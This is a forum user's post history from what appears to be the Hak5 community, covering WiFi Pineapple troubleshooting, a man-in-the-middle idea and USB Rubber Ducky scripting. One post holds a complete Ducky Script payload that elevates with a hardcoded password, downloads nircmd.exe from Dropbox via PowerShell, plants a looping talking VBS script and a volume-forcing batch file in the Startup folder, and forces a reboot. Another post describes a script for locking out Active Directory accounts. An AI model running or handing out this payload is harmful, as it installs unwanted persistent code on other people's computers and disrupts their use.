Jump to content

C3PBRO

Active Members
  • Posts

    59
  • Joined

  • Last visited

Everything posted by C3PBRO

  1. I have a 12V 1.5 laying around, not sure if it will blow it. Happened to my mate with PoE, and if mine dies I'll be crazy mad.
  2. So my Mark V has been cruising along well. I made up a USB to DC power cable, and used it twice just to see if it would bootup. I then used my power supply a couple times after. However the other day i went to boot my pineapple up and it doesn't do anything, so i plugged it into the converter i made, at it works just fine. So i have come to the conclusion to adapter it came with is stuffed (and yes i did remove and replace my power plug adapter). What should i do? Cheers
  3. Jebus, could you explain to me what's in that thing?! I'm still struggling with taking it out of its casing haha
  4. How often did you use it? Would you say it's 'risky' using it with the Mark V because it needs more power for the two chipsets?
  5. Hey guys, just wondering would it be possible to port van Hauser's IPV6 suite, or just the flood_router26 part to the pineapple? It would be pretty handy to have. link to the suite : https://www.thc.org/thc-ipv6/ some info on flood_router26 : http://samsclass.info/ipv6/proj/RA_flood2.htm video of it in action : http://www.youtube.com/embed/ykameNXRLOo cheers
  6. Will I have to issue this command after every reboot? Or only after a factory reset?
  7. SO, i know this has been brought up before... But im literally up shit creek with no paddle. Is wlan0 ment to be radio1 and vis- versa? Just a bit confused with whats going on. (im having the "client mode" error) Oh and i have connect my pineapple via tether to my linux machine, so i have interent. I have also updated the "Client Mode" infusion, which didnt do anything... Cheers my technolustians.
  8. Nice man. Keen to see the results :)
  9. Thanks for your help. Could i edit and swap the wireless cards in the config file? PS. I agree this forum really needs some more stickies to help us nooblets out :)
  10. Yea, so i just got my pineapple... Flashed it, works fine until i try to connect to another wifi access point. I enable both wireless cards, click on the "network" tile, then "client mode" and try to connect to my network. Within about 3 seconds my pineapple crashes and has a constant green LED with no other lights. After rebooting it has the same issue, so the only way to fix it is do a DIP switch reset. I have tried taking the encryption off the access point im trying to access as well, with no avail. Cheers
  11. I live in Sydney! I hear a lot of tourists saying how amazing the Opera House & Harbour Bridge is, so i suggest Sydney... Anyway the hak5 team should totally visit down under ;)
  12. woah nice man, thanks for posting this :) just cant wait for mine to show up... (live in aussie, give it 3 weeks haha)
  13. Hey guys, just bought a Mark 5 :D, just wondering with two chipsets now in the pineapple would it be possible to connect one to a network and use the other as the main-in-the-middle card? Therefore eliminating the need for a 3G/4G Dongle? For example: iPhone--->Searches for McDonalds Free Wifi--->Connects to pineapple (with Atheros chipset using karma)--->Pineapple connects to McDonalds free wifi using other RTL chipset--->Re-directs all trafic through your pineapple--->Possible Profit? Cheers
  14. Great work with these new payloads man! keep it up!
  15. This is my first payload, the delays are set for my slow netbook computer. You will have to run the cmd as an admin, to do this you could simply add a RUNAS command in cmd to my script. The whole proccess should be fairly fast, be sure to read the REM in the code to understand what it does. Enjoy! REM Downloads nircmd.exe (google search for more info) REM Saves it to %appdata% REM Makes a vbs script that tells the computer to say a message of your choice, saves it to the startup folder REM Creates a batch file that runs nircmd.exe on start up and makes sure the system volume is unmuted and set at full REM Reboots the computer in 5 minutes after proccess is complete DELAY 2000 GUI r DELAY 200 STRING cmd DELAY 200 ENTER DELAY 200 REM ###############################################################################################downloads nircmd.exe################################################################################# STRING runas /noprofile /user:%computername%\Administrator cmd DELAY 300 ENTER STRING Perspective10 DELAY 200 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/yb9f26ddf01yc4z/nircmd.exe?dl=1','%appdata%\nircmd.exe');" DELAY 200 ENTER REM ########################################################################################finishes downloading nircmd.exe######################################################################################## DELAY 6000 STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup ENTER DELAY 100 REM #######################################################################################Starts vbs script that talks######################################################################################### STRING copy con hackasaurusrex.vbs ENTER STRING do ENTER STRING set fso=CreateObject("Scripting.FileSystemObject") ENTER STRING set shell=CreateObject("Wscript.Shell") ENTER STRING StrText="VISIT I T TO GET THIS PROBLEM FIXED" ENTER STRING set Objvoice=CreateObject("SAPI.SpVoice") ENTER STRING Objvoice.Speak StrText ENTER STRING loop DELAY 200 CTRL z ENTER REM #########################################################################################Ends vbs script that talks####################################################################################### STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup DELAY 100 ENTER #################################################################################Starts batch file for volume############################################################################################### STRING copy con volume.bat ENTER DELAY 200 STRING @echo off ENTER STRING cd %appdata% ENTER DELAY 100 STRING nircmd.exe mutesysvolume 0 DELAY 200 ENTER STRING nircmd.exe setsysvolume 65535 ENTER DELAY 200 STRING exit ENTER CTRL z ENTER ####################################################################Ends batch file for vomlume############################################################################################################ STRING shutdown /r /t 300 DELAY 100 ENTER STRING exit ENTER DELAY 200 STRING exit ENTER DELAY 200 ENTER
  16. I have written a script much the same as what you have described. It entered a username on the active directory at a windows logon screen and continually entered the wrong password. In theory it will lock out the account. The only issue i came across was trying to get the delays right between the "Welcome" message and the actual login screen after each attempt.
  17. Awsome snake! I can't wait for this to happen, if you need any beta testers, I'm always available :3
  18. Sup my fellow ducky owners, i am trying to get my ducky to send the CTRL ALT DELETE keychain in windows but cant get it to work :(. Any help would be much appreciated!
  19. Kudos snake! A firmware that I would love to eventually see is one that has the ability to act like a normal mass storage device when plugged in, but when a certain key is pressed it triggers the inject.bin script. (Instead of auto triggering the script when the duck is plugged in)
  20. Don't worry, figured it out. I didn't have the Microsoft Visual C++ 2010 Redistributable installed... silly me
×
×
  • Create New...